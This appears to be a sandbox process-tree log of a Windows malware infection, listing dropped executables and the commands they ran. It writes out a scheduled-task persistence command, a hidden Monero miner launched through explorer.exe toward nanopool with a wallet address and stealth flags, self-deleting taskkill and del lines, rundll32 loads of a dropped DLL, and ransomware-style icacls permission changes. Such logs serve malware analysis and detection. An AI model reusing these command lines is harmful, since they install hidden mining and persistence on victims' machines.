C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:832
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵PID:660
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:3092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵PID:3080
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Creates scheduled task(s)
PID:3144
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵PID:3528
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"3⤵PID:2516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit4⤵PID:2424
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Alfanewfile2.exe /f5⤵
- Kills process with taskkill
PID:2120
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:2676
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit4⤵PID:2212
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵PID:2588
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵PID:2348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵PID:2472
-
C:\Users\Admin\AppData\Roaming\1100497.exe"C:\Users\Admin\AppData\Roaming\1100497.exe"4⤵PID:2664
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2664 -s 365⤵
- Program crash
PID:2056
-
-
-
C:\Users\Admin\AppData\Roaming\1541680.exe"C:\Users\Admin\AppData\Roaming\1541680.exe"4⤵PID:944
-
-
C:\Users\Admin\AppData\Roaming\5980488.exe"C:\Users\Admin\AppData\Roaming\5980488.exe"4⤵PID:2300
-
-
C:\Users\Admin\AppData\Roaming\5112709.exe"C:\Users\Admin\AppData\Roaming\5112709.exe"4⤵PID:2444
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a4⤵PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue1109eec571ac.exeTue1109eec571ac.exe /mixone1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue1109eec571ac.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue1109eec571ac.exe" & exit2⤵PID:2616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue1109eec571ac.exe" /f3⤵
- Kills process with taskkill
PID:2784
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC658D154\Tue11b9d76a96506.exeTue11b9d76a96506.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:692
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2568 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f1⤵
- Kills process with taskkill
PID:2900
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2568 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1904
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3616
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 71276E865E5E340F54DEA0D032C18EE7 C2⤵PID:3804
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DCA13C43A7448103B71281CFAAB6C2182⤵PID:3156
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3456
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3652
-
-
C:\Users\Admin\AppData\Local\Temp\E927.exeC:\Users\Admin\AppData\Local\Temp\E927.exe1⤵PID:2672
-
C:\Users\Admin\AppData\Local\Temp\3FCF.exeC:\Users\Admin\AppData\Local\Temp\3FCF.exe1⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\77E0.exeC:\Users\Admin\AppData\Local\Temp\77E0.exe1⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\77E0.exeC:\Users\Admin\AppData\Local\Temp\77E0.exe2⤵PID:3460
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\36edb94e-a145-4446-bca9-487739cbfc47" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:3548
-
-
C:\Users\Admin\AppData\Local\Temp\77E0.exe"C:\Users\Admin\AppData\Local\Temp\77E0.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\E18C.exeC:\Users\Admin\AppData\Local\Temp\E18C.exe1⤵PID:3940